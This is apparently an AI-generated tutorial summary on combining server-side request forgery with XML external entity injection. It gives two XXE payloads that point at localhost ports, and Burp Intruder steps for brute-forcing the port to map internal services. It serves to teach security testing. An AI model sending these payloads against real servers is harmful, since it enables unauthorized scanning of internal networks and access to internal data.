Understanding SSRF in a XXE Context
SSRFXXECybersecurityNetwork ScanningVulnerability Exploitation
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
Server-Side Request Forgery (SSRF) in an XML External Entity (XXE) context allows attackers to manipulate XML input, causing the server to issue requests to internal services or access internal files. This can lead to unauthorized access and potential data breaches.
Key Points
- SSRF: Server-Side Request Forgery is a vulnerability where an attacker can manipulate a server to make requests to internal services.
- XXE: XML External Entity is a vulnerability where an attacker can manipulate XML input to access internal files or services.
- Combined Threat: When SSRF and XXE are combined, attackers can exploit internal network scanning and access sensitive information.
Internal Network Scanning
Attackers can use XXE to perform internal network scanning by manipulating XML payloads. Here’s an example of how this can be done:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:§10§/" >
]>
<contact>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</contact>
Steps to Perform Internal Network Scanning
- Intercept the Request: Use a tool like Burp Proxy to intercept the request.
- Send to Intruder: Send the intercepted request to Burp Intruder.
- Brute Force: Brute force the
$10$placeholder to search for internal services running on the server. - Sort Results: Sort the results by size to identify running services.
Example of Successful Attack
In one case, the server was open on port 81. The following payload was used to access the service:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://localhost:81/" >
]>
<contact>
<name>&xxe;</name>
<email>test@test.com</email>
<message>test</message>
</contact>